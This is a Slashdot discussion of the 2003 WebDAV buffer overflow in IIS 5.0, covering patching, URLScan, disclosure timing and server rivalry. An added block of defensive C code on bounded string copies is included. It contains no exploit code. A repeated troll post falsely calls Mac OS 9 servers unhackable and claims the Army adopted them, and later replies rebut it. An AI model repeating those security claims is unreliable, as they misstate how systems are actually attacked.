WebDAV Buffer Overflow Attack Compromises IIS 5.0
rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
(looks at watch) It's Monday again... time to go patch my IIS
Well duh, "patch my IIS", it's Monday isn't it?
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
WebDAV has been a headache for a long time, until I decided to just disable it altogether. I realized I never had a purpose for it, personally, so I added the disabling registry key to all my servers. If you know of any good that WebDAV does, I'd like to know about it.
Th
Hm.. ok.. another day, another Microsoft security hole. I wonder if even half of all Windows users use Windows Update. =P
-------
"In times of universal deceit, telling the truth becomes a revolutionary act."
-- George Orwell
When they get a bug free Windows, they'll have to put some in just so bored /. readers have something to laugh at....
If you're happy and you know it read my blog
I don't know why anyone uses it anymore. I'm switching back to Morse Code. Who's with me?
A buffer overflow allowing an entire system takeover... Why is the code that the web server has access to change allowed to take over the system?
If you listened to the Gartner Group, you stopped using IIS last year.
If you didn't, well, get with the program!
Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.
Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
All of these "patch" issues should be listed and sent to management with a recommendation of switching to a more secure *nix alternative. When will the truth beat out the Microsoft ad machine?
Cue 2,000 microsoft bashing messages...
Slashdot is not the place you want to read about things like this, if you really need / want to be on the ball. You need to subscribe to bugtraq and nanog. You'd be surprised... it's like knowing the future!
Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendency to run unpatched machines.
It looks like this was the exploit used to hack into an Army machine recently. Check out the link from MSNBC here.
I was ready to uninstall IIS when it occurred to me that Exchange 2K needs it. I was ready to uninstall Exchange 2K when I realized users would not be able to function. Whew, luckily I came to my senses...
So is this any kind of standard WebDAV or just a particular proprietary implementation of similar features in IIS?
I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.
"Provided by the management for your protection."
It seems quite likely to me that that was an under-reported version of this incident reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.
Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.
I treat all servers fairly, regardless of background, age or reliability :-)
Yes I know my own comment is off topic and I've even switched off my Karma Bonus :)
Rus
It's hardly news, is it? It's not like "Oh! Another Microsoft security hole, big surprise there!" kinda thing. It's like joining the beer-a-week club and then acting all surprised when you get a beer every week. Oh my! I joined the beer of the week club and I just got a beer! Astounding!
If CERT would just move their headquarters to the IIS devs' room in Redmond, that would probably save a lot of money for CERT. They should be a part of the regular IIS dev team.
That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft has been aware of this and working on the patch, but if there was time for an exploit to be developed, enough time has already passed. If administrators had been aware of the problem, at least they could have disabled WebDAV, even without a fix, instead of waiting blindly for someone to hack them.
I was going to make some smart-aleck comment about "YET ANOTHER M$ security flaw", and how this entire story should be modded -1, redundant...
But *sigh* no. That's too easy.
It's sad, really. Just sad.
I have some boxen to go exploit.
"We are the music makers, and we are the dreamers of dreams."
It says near the bottom that IIS systems with URL scan which is part of the lockdown utility are not affected by this.
/.'s don't like Microsoft and that's sad because Microsoft is the driving company behind many many jobs. The arrival of Windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net, and look at how things accelerated... why... because ma/pa people use Windows, not *nix. Just the facts.
Why would you run an IIS server without using the lockdown utility??
We (large corporation) have been using IIS servers without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.
I think this story is a bit overblown. It appears that most
cheers
John
I've asked this everywhere, maybe someone will answer.
... We don't run the default config. We've customized it, as have many shops. I can't find information on _which_ aspects of URLScan provide the protection - I'd like to know if our customizations have left us out in the breeze.
The MS advisory states that a 'default' URLScan will protect against this. Well
Anyone know?
And I thought that Penguin on the Microsoft home page looked at little out of place.
/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i
Why would anyone need to download patches for a Microsoft product? I've been getting about 5 in the mail every day lately.
Sheesh, evil *and* a jerk. -- Jade
The exploit has been in the wild since last Wednesday. Microsoft has known about it since that time. Five days to a patch is really good for Microsoft but, the last Apache bug was fixed on the day of discovery, long before any exploits appeared.
I hate liberals. If you are a liberal, do not reply.
I think one critical issue with the timings of patch releases is stated right up there in the post: exploits are already out and about... for 3 days!
I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.
If there is some cracker out there that has found this bug, then I'm sure there is a security expert that has also found and reported it. Code Red, IIRC, could've been stopped by a fix available 6 months earlier.
Of course, I'm not in any way a security expert or even amateur, and I'm not a server admin, nor did I RTFA.
IANAL, but I play one on
Does this affect Windows XP Home/Pro in any way? The patch doesn't seem to apply to XP, but does the vulnerability?
At least they noticed that an exploit exists. Sure, it may take a little while to make a patch, but at least there will be a fix soon. Hopefully, this should increase the overall security of IIS, which would of course be a good thing.
Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it. The quality of webservers will rise slightly.
The improvement of IIS is also a good thing for businesses that rely on it because of ASP. Perhaps they wish to move to Apache, but cannot because of their language of choice for development on their webserver. Should they be more vulnerable to hacker attacks, just because of their choice of language? No.
The conflict between Apache and IIS is generally a good thing.
Because of the lack of WebDAV protocol standards, I have never been able to make the redirector capabilities of WinXP work correctly for several supposedly WebDAV-enabled sites. Because of this shortcoming, your SMB-replacement argument also breaks down.
Twelve-and-three-quarter inches. Unyielding. This wand belonged to Bellatrix Lestrange.
I think it's ironic that with every remote security hole and exploit, including the few that affect a majority of BSD installations, no one is addressing the fact that there are more secure platforms for webserving. Instead of focusing on the porous unix/linux offerings, or MS weaknesses, such as this recent WebDAV IIS 5.
:
It is a concrete fact that that no MacOS based webserver has ever been hacked into in the history of the internet.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are are unbreakable based on historical evidence.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac for a web server.
I am not talking about FreeBSD-derived MacOS X (which already had more than 32 exploits and potential exploits); I am talking about current Mac OS 9.x and earlier. Apple's Mac OS 9.2.2 is the latest and came out this last summer. According to Google HTTP requests, Mac OS 9 users outnumber Mac OS X almost 9 to 1. Luckily for them they are all secure.
Why is it hack proof? These reasons:
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT. Apple uses an object model for process to process communication that is heavily typed and "pipe-less"
2> No Root user. All Mac developers know their code is always running at root. Nothing is higher (except undocumented microkernel stuff where you pass Gary Davidian's birthday into certain registers and make a special call). By always being root there is no false sense of security, and programming is done carefully.
3> Pascal strings. ANSI C strings are the number one way people exploit Linux and Wintel boxes. The Mac avoids C strings historically in most of its OS. In fact even its ROMs originally used Pascal strings. As you know Pascal strings (length prefixed) are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is less buffer exploits. Individual 3rd party products may use C strings and bind to ANSI libraries, but many do not. In case you are not aware of what a "pascal string" is, it usually has no null byte terminator.
4> Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). File types on Macs are not easily settable by users, especially remotely. Apache as you know has had many problems in earlier years preventing wayward execution.
5> Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! For example the file type is 4 characters of user-invisible attributes, along with many other invisible attributes, but these 4 bytes cannot be set by most tool oriented utilities that work with data files. For example file copy utilities preserve launchable file-types, but JPEG MPEG HTML TXT etc oriented tools are physically incapable by design of creating an executable file. The file type is not set to executable for the hacker's needs. In fact it's even more secure than that. A mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc are merely data files and lack resource fork files, and even if they had them they would lack launch information. But the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
4> Stack return address positioned in safer location than some intel OSes. Buffer exploits take advantage of loser programmers' lack of string length checking and clobber the return address to run
The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.
Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.
Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.
So, in summary:
It's all Microsoft's fault. It's crap software.
That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.
It seems open source bugs/ exploits/ vulnerabilities are always conveniently buried somewhere other than on the front page.
Not to say Microsoft software is secure, but hey. "Fair and balanced" never was part of the /. motto.
MSNBC has an interesting article about this attack being used on an Army machine. What's good to note is that the attackers discovered the flaw, NOT security researchers which is the norm.
It's a known fact in many press releases that the US army uses macs as servers and the ones that recently avoided using mac got quickly rooted with secret unpublished IIS exploits :
http://www.msnbc.com/news/886524.asp?0dm=C11KT
I doubt the Army will make that mistake again.
Everything in that post was 100% factual, shame on you you anti-security anti-mac bigot.
All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!
I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!
"Luck is the residue of design" -- Branch Rickey
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
I think this story is a bit overblown. Umm, not at all. It is quite a serious incident.
It appears that most /.'s don't like microsoft
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?
and thats sad because microsoft is the driving company behind many many jobs
They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.
The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Does this explain my weblogs having /ADMIN%24
PROPFIND
in them ?
My SGI doesn't know what ADMIN$ is.
Is there a Micro$oftese font pack for SGI ??? SGI won't speak to me unless I get a service agreement!
www.cgisecurity.com
www.cgisecurity.com/lib/
If you have to use IIS for some reason, put a Squid proxy running on your favorite OS in front of it. It will save you a lot of trouble.
The word "mac" doesn't appear once in the msnbc article.
And in the 5 years I've done contract work at the pentagon, I've yet to see a violet colored iMac or pretentious powerbook.
In short, you are full of shit.
"Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it."
Why wait for Microsoft when ASP.Net is already being ported?
Instead of wasting money and time plugging every hole in IIS, why just not use Apache or Zope?
Both run on Win32. Both are free. Both are stable. Both are fast. Both are good.
o/t but check out this incredibly intelligent and insightful article on CNN.
File-sharing sites allow trading of porn
WASHINGTON (CNN) -- The same technology used to download music from file-sharing sites makes it possible to trade pornography, tech experts testified at a Capitol Hill hearing Thursday
-----
Who says the government doesn't have my best interests in mind?
My tax dollars at work. Now I can get porn on KaZaa, too.
I don't need no instructions to know how to rock!!!!
WebDAV is more like a VPN. Sure, you COULD set it up poorly and give everybody access to all your documents.
On the other hand, using any number of authentication schemes (including through an LDAP server, behind a firewall), you can lock it down as tightly as you'd like. And yes, it runs over HTTPS as well as HTTP, so even your port 80 crack is laughable.
Or perhaps you think all web-based applications are inherently insecure? (I'd like some evidence to back this one up)
http://www.webstar.com/press/press_releases/pr091499.html
.mil sites (even though many pretend to FINGER and respond as non-macs). Simple server sniffing logic based on characterizations detect what OS it REALLY is, but sniffing.mil sends americans to jail.
The mac security post is 100% factual. With the recent root-defacement of http://www.msnbc.com/news/886524.asp?0dm=C11KT It seems the Army will stick with Macs for more of its
Kill 1 Mad Guy (Bu$H) - Save 1 Mio. Lives
The worst spacial incident in recorded history occurred only a few months ago and you people are talking about exploits in IIS yet again?!?! My GOD, people, GET SOME BLOODY PRIORITIES!
Incompetent sysadmins still are the weakest link.
:(
Take a look at the World Health Organization South-East Asia web site:
http://w3.whosea.org/index.htm
They're running IIS 4.0. FOUR.POINT.ZERO.
The deface has been there for almost a day with apparently no fix yet
You know, if people periodically checked Windows Update, this would not be that big of a deal; additionally, if you have SP3 installed you can tell it to automagically install any critical updates for you without prompting. Case solved.
I don't think that's right. It may change the exact number of bytes necessary to smash the stack, but an unchecked buffer is an unchecked buffer.
I'm guessing that the IIS in XP might be vulnerable, but that IIS should only be used for testing, not on a live site. Who wants to run a live site on XP Pro when it's limited to 10 connections (and a single web browser will typically open 4 connections)?
URLscan along with the IIS lockdown, keep me from worrying about much of anything. Only a hack to the ASP ISAPI would get me worried. Do I wish that these tools were incorporated into IIS to begin with? Yes, but you can only bitch for so long before you look stupid for not locking it down yourself.
I'm not drunk, I just have a speech impediment. And a stomach virus. And an inner ear infection.
The problem with this patch is that it wasn't found by a white hat and submitted. It was discovered by people getting hacked and calling MS asking WTF. In cases like that, 5 days isn't really that bad. In cases where an exploit, along with vulnerability code, and a description are fed to devs on a platter, open source or not, it makes the task 10x easier. When you have to figure out what is going on while under fire, and in a hurry, things get messy. That said, you can hack a lot of systems in 5 days with the right script.
-Charlie
It's already on WindowsUpdate, so it makes for an easy patch. Just the damned reboot...
:)
But let's not get too smug, there have been a number of open source exploits found lately. They just don't seem to make it to the front page of Slashdot...for some reason.
No, it is mandated under the DOJ settlement. Look at page 193, par. 19, lines 12-13, the 'punishment' section. It clearly states that MS shall, as a result of being found guilty of several very bad things, suffer harsh penalties. Those penalties are putting a penguin on several pages of the site, and forcing a junior VP to apologise to at least 3 random people on the street. That'll learn em.
-Charlie
Sure, another MS exploit. Seems to be one almost every week, and it sucks.
/. chose to post this article, but reject an article I submitted yesterday about a very serious security hole in Opera - Opera describe it as "extremely critical".
/. displaying an unfair bias?
What I do find interesting is that
I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".
Just more of
Excuse the lame question, but is there _any_ computer language out there that can completely prevent buffer overflows and other common attacks?
This possibly endless, iterative procedure for every_single_program_written out there is getting very tiresome. When is a program totally secure, or better yet, is any program ever secure from any future attacks?
At the least, this certainly isn't the FUTURE of computing (I hope!).
First, our nation is faced with a war within 48 hours, then I pickup the link to a MS patch on Slashdot... What next? Hell freezing over in a week???
Slashdot.. Land of nerds, trolls, and FlameBait..
...yeah.
Let's all laugh, shall we?
Any safe language prevents against buffer overflow attacks, printf-style bugs, heap corruption and double-free bugs. Java or O'Caml or SML would be good choices. SML also protects against integer overflows. SML and O'Caml, for their parts, are only about 20% slower than C and a whole lot more fun to program in.
I wrote an FTP server in SML (http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/tom7misc/net/mlftpd/) so I wouldn't need to worry about buffer overflows any more. It was really easy. It blows my mind that all of the security-obsessed unix people are still manually putting in their buffer length (etc.) checks in tortured legacy C code, when they could so easily have a set of daemons that are totally immune to that sort of attack.
Of course, any language that lets you write interesting programs (ie, "telnetd") will also let you write programs with security holes. (In a sense, telnetd is itself a security hole, provided you have the password!) But having the compiler automatically ensure that the largest class is impossible gives you a lot more time to work on other, more subtle security problems.
This post is a lot like the "BSD is dying" troll that's just not going away. Every once in a while some idiot posts it, and a few other idiots moderate it up. Anyway, on to debunking.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are are unbreakable based on historical evidence.
Really? Is that because it crashed every time someone tried to access it? Considering that MacOS does not even have preemptive multitasking or proper memory protection, it's not that hard to imagine. MacOS has a really nice GUI, but in terms of technology it is behind even Windows 95.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
Hmmm, there are no exploits for DOS either. Are we to conclude that DOS is the most secure OS ever?
No command shell...
BFD! If you gain control of a process (through buffer overflow, for example) and manage to execute your own code, you still have complete control of the system. Heck, the current bug in IIS has nothing to do with exploiting shell.
No Root user.
The troll is only getting better. Ladies and gentlemen, it has come to our attention that the competitors' cars have malfunctioning seatbelts and thus cause injuries to passengers in a collision. Our MacCar has no seatbelts, therefore it is not vulnerable to collisions.
You know, IIS also runs as root (or rather LocalSystem in NT terms). By always running as root there is no false sense of security and programming is done carefully. Doesn't seem to help though...
Pascal strings.... As you know Pascal strings (length prefixed) are faster than C...but the side effect is less buffer exploits
...and they are limited to 255 bytes in length. (For those who did not program in pascal, the first character in the char array represents the length of the string. Since unsigned char's maximum value is 255, that's the maximum length of the string). Anyway, a buffer overflow occurs when you try to write more data than you can fit in the buffer. The only way a compiler could prevent that is if it inserts length checks before every write, and either truncates the string or terminates the program. It's been a loooong time since I touched pascal, so I don't remember how it handles that, but in any case it's irrelevant: is WebStar written in Pascal? In fact, besides some legacy code in MacOS, is anything at all written in Pascal these days?
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension).
Unix running Apache have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). (You can't run some random data).
Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing!
Unix never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! (You need to set executable permission first).
but the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
Yeah, and when I leave the house I put my keys under the rug usually. TOTAL security. I mean who would possibly figure out how to create "resource forks" and such?
Stack return address positioned in safer location than some intel Osses.
That is the property of the hardware, not OS. Do you understand the distinction?
7> There are less macs, though there are huge cash prizes for cracking into a MacOS based WebStar server (typically over $10,000 US). Less macs means less hacker interest
What happened to 5> and 6>? Were those arguments too stupid even by your standards?
Anyway, in this paragraph you are contradicting yourself: on the one hand you are claiming that macs are safer because there is less
___
If you think big enough, you'll never have to do it.
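The reply above makes the point that a length prefix does not stop an overflow by itself; a check before every write does, and the one-byte prefix is also why a Pascal string tops out at 255 bytes. The following is an added example written for this page (it is not code from any poster, from WebStar or from any Pascal runtime): a tiny length-prefixed string type whose set and append operations truncate and report instead of overrunning, beside the same discipline for a plain C buffer, where the caller supplies the capacity and the copy refuses when the data would not fit. The type and function names (pstring, pstr_set, pstr_append, cstr_copy_checked) are hypothetical, and the 299-byte "request path" is a constructed input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Pascal-style string: a one-byte length prefix followed by at most 255
 * characters. The prefix is the reason for the 255-byte ceiling. */
typedef struct {
    uint8_t len;
    char data[255];
} pstring;

/* Copy a C string into a Pascal string, truncating to 255 bytes.
 * Returns 1 if truncation happened, 0 otherwise; never writes past data[254]. */
int pstr_set(pstring *dst, const char *src)
{
    size_t n = strlen(src);
    int truncated = n > 255;
    if (truncated)
        n = 255;
    memcpy(dst->data, src, n);
    dst->len = (uint8_t)n;
    return truncated;
}

/* Append to a Pascal string. Overflows usually happen while a value is built
 * piece by piece, not on the first copy, so the append needs the same check. */
int pstr_append(pstring *dst, const char *src)
{
    size_t room = 255 - dst->len;
    size_t n = strlen(src);
    int truncated = n > room;
    if (truncated)
        n = room;
    memcpy(dst->data + dst->len, src, n);
    dst->len = (uint8_t)(dst->len + n);
    return truncated;
}

/* The equivalent discipline for a plain C buffer: the caller passes the
 * capacity and the copy refuses (returns -1) instead of overrunning.
 * strcpy() has no capacity argument, which is how unchecked buffers arise. */
int cstr_copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;          /* no room for the bytes plus the NUL terminator */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Demonstration with a constructed 299-byte request path. */
int main(void)
{
    char big[300];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    pstring p;
    int t1 = pstr_set(&p, "/");
    printf("pascal set: truncated=%d len=%u\n", t1, p.len);
    int t2 = pstr_append(&p, big);
    printf("pascal append: truncated=%d len=%u\n", t2, p.len);

    char small[64];
    int rc1 = cstr_copy_checked(small, sizeof small, big);
    printf("checked C copy of %zu bytes into 64: rc=%d\n", strlen(big), rc1);
    int rc2 = cstr_copy_checked(small, sizeof small, "/index.html");
    printf("checked C copy of short path: rc=%d -> %s\n", rc2, small);
    return 0;
}
```

Truncating silently is itself a choice with consequences (a path or header that was cut short is no longer the one the client sent), which is why the checked C copy refuses rather than truncates; either way the bound is enforced by the code that writes, not by the string format.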
Oh, geez, this was almost a guaranteed +5 with the biased mods in an article like this.
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
But ALL of yours were dumb! Stupid-head!
Umm, not at all. It is quite a serious incident.
He just explained why it was overblown.
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?
This is the point at which I realized YOUR post was the troll. You're ridiculously hostile over the fact that somebody dared breathe a word that an MS vulnerability was overblown.
They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
I can agree with that paragraph.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
Yeah, the big bad company bought good software from other people to sell. How dare they.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Cue standard wild-eyed anti-corporate Slashdot paranoia conspiracy theory.
They'll jump up and down screaming about how many patches IIS needs to remain secure, while not mentioning that Apache has four security patches in the last six months while IIS only has two. And if you remind them of that, they'll scream "It's because open source is better, it allowed the bugs to be found and fixed quicker." Whatever... Keith
Right. You've been getting 5 patches in the mail every day lately.
Sure.
Why is a security bug in the MS webserver news but a similar bug in the Sun webserver is not?
Oh wait, this is Slashdot and Bill Gates is evil...
Hole found in Sun server software
A flaw in Sun Microsystems' Web server software could allow hackers to gain control of Web sites, a security consulting company warned.
This is Slashdot! You think standard logic and calm reasoning exists around here? This is the land of knee-jerk reactions and biased anecdotal holier-than-thou elitism, my friend.
Simply telling people that Windows Update can AUTOMATICALLY download and install updates will cause them to go off into standard EULA rants anyway.
On the other hand, using any number of authentication schemes (including through an LDAP server, behind a firewall), you can lock it down as tightly as you'd like. And yes, it runs over HTTPS as well as HTTP, so even your port 80 crack is laughable.
I dunno...I mean yeah, but the whole point of this sploit is that none of that matters since you have local admin rights on the IIS\Webdav server.
How are you going to not give the local system account of the WebDAV server access rights to the documents you're WebDAVing?
Of course, I still don't know what WebDAV is, but I installed that patch. The threat looks pretty amazingly significant, even without WebDAV's extra features.
In related news, it was confirmed by oceanographic researchers this morning that the Pacific Ocean is wet.
When all you have is a hammer, everything looks like a skull.
Dumping IIS because of a few security holes is really fucking stupid for a ton of reasons that I don't even have time to go into.
****
It's not the holes, it's the policy. IIS runs as LocalSystem by default. ANY breakage in IIS leads to a full system compromise. With Apache, since it runs as its own user, usually there is very little damage from a compromise. If you fully compromise Apache with normal security settings:
* You still can't modify people's files
* You can't even modify the apache config files
The only exception is that if it is running Active Content, you can do anything that the active content can do. That's problematic, but nowhere near the problems of a full system compromise.
Engineering and the Ultimate
Slightly less equally vulnerable.
Slightly faster.
Slightly more reliable.
Slightly more manageable.
Slightly cheaper.
Slightly less pain.
No, it is clear that *you* don't understand security. Specifically:
Please, get a clue.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
what are the chances this is related to http://www.msnbc.com/news/886524.asp?0cv=CB20
army sites being hacked with "disturbing" effectiveness?
from the bulletin:
Who should read this bulletin: Systems administrators running Microsoft ® Windows ® 2000
from the patch download page:
Supported Operating Systems: Windows 2000
Windows 2000 Professional
Windows 2000 Server
Windows 2000 Advanced Server
Internet Information Server 5.0
No XP; No IIS 5.1
The truth doesn't care what I think.
It's not the holes, it's the policy. IIS runs as LocalSystem by default.
So what? You can run IIS under any user. Also, NTFS has very granular file level permissions. It's no less secure than Apache. Default settings do not have a whole hell of a lot of bearing on the quality of an app in my book. That's why they're settings... they can be changed.
As is the journal entry it links to.
You spent 3 months developing something on a completely different platform and then are surprised when it doesn't work on the target platform? Next time, why don't you do a little research before you buy into the "write once, run anywhere" hype?
Christ. No wonder it's so hard to get a job in IT nowadays, idiots like you somehow get all the jobs!
Fun reply, thanks.
Feel free to elaborate. Defend your points, and I'd be happy to explain.
While this makes the front page so we can all have our obligatory cracks at Microsoft, a similar (and just as important!) remote root exploit in Samba was just fixed today.
NO CARRIER
I thought it was. It's been a long time since I've installed it, but I remember the confusion when XP came out because IIS wasn't there after install.
The truth doesn't care what I think.
Since when is a serious IIS security issue news? How do we mod the story as flamebait?
* WebDAV is *nothing* like a VPN.
A VPN has end to end encryption that is what makes it secure. Does WebDAV have end to end encryption?
* "using any number of authentication schemes" does not "lock down" anything at all.
If your security depends on authentication schemes you are hosed. You have to have authentication but you also have to have a whole slew of other measures. Which WebDAV does not.
* It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
This is because if you are using 80 or 443 then there is no way to control or shut down the file sharing without also shutting down web access. This is a *bad* thing. Also it makes firewall logs useless.
* Web applications are irrelevant to network security.
Your network has to be secure and have a good security policy and then web apps should be made to work within that framework rather than skirt it.
I want to kill whoever redefined "firewall friendly" to mean "tunnels through 80"
Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
Um...before you get all cocky and make an ass out of yourself for stating uninformed SHIT yourself, check out: www.army.mil
http://uptime.netcraft.com/up/graph/?host=www.army.mil
So much for your credibility.
http://uptime.netcraft.com/up/graph/?host=www.army.mil :)
Damn space.
Sure, I can't wait to hear it...
- WebDAV is *nothing* like a VPN.
A VPN provides secure access to a remote network via one or more untrusted networks, typically the Internet. Once a VPN is established, the local endpoint has access to the remote network's resources including, but not limited to, file, mail, directory, print and web servers. Existing protocols such as IMAP, POP, HTTP, LDAP, NFS and SMB can be used over the VPN in a mostly secure and transparent manner.
WebDAV is an extension to HTTP - The Hypertext Transport Protocol. HTTP is designed to transport hypertext (hence its name) and other media via TCP. WebDAV provides distributed authoring and publishing extensions to HTTP to allow, amongst other things, remote collaboration. Using WebDAV for a network file system is akin to using FTP for the same. It is a bad idea.
=> WebDAV is nothing like a VPN.
- "using any number of authentication schemes" does not "lock down" anything at all.
- It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
Doing everything via HTTP, whether running plain text over port 80, encrypted over port 443 or any other combination is bad practice. One of SOAP's (and WebDAV's) "features" is that it allows you to do stuff over HTTP that would usually otherwise be blocked by a firewall. Want to do RPC? Sure! Just tunnel it through port 80! Want to do file sharing? Sure! Just tunnel it through port 80! This is seriously screwed up. It defeats a primary purpose for which firewalls were invented in the first place; to limit access to dangerous services. Not to mention that using HTTP for everything is a serious architectural design flaw as well.
Putting authentication in front of HTTP and/or tunneling it over SSL does not fix these problems. This IIS exploit du jour is a perfect example of such.
- Web applications are irrelevant to network security.
A web application should be well designed and implemented, with security in mind. It should be deployed on a network which is properly secured. It should be running on systems which are properly secured. Making a web application secure does not make a network secure (and vice versa). "Irrelevant" is probably too strong a word, but the security of a network should never be dependent on the security of a web application.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
Misread the headline as 'WebDAV: Buffy Overcome and Attacks Consumer IIS 5.0'
Would have made for a much more interesting story anyway.
Blame whoever decided that all firewalls must block all traffic that's not HTTP and e-mail.
I'm so glad that Samba security hole - with exploit - was posted off the main page, so we had more room for this.
In your enthusiasm to slam Microsoft, I get a Really Good Feel for when a patch is critical or not. It lets me ignore the servers until a front page Slashdot article shows up.
So, Danke!
"Draco dormiens nunquam titillandus."
Most discovery to patch timelines go like this:
[researcher finds vulnerability]->[notifies vendor]->[waits impatiently for a month or so]->[vendor releases patch in hotfix or service pack]
This case was completely different and demonstrates a disturbing trend in security research. NO ONE knew about this until it was discovered in the wild. Usually the script kiddies find out about the flaw the same day customers do and then it's an arms race to patch. This time the kids were armed with the exploit before even Microsoft knew about it. The trend of exploits staying secret has started to rear its ugly head and this is the first major case where it's happened. Don't be surprised if this starts happening more and more. The good news is that MS was able to cough up a patch in a matter of days. The bad is that black hats are obviously keeping secrets about flaws they find.
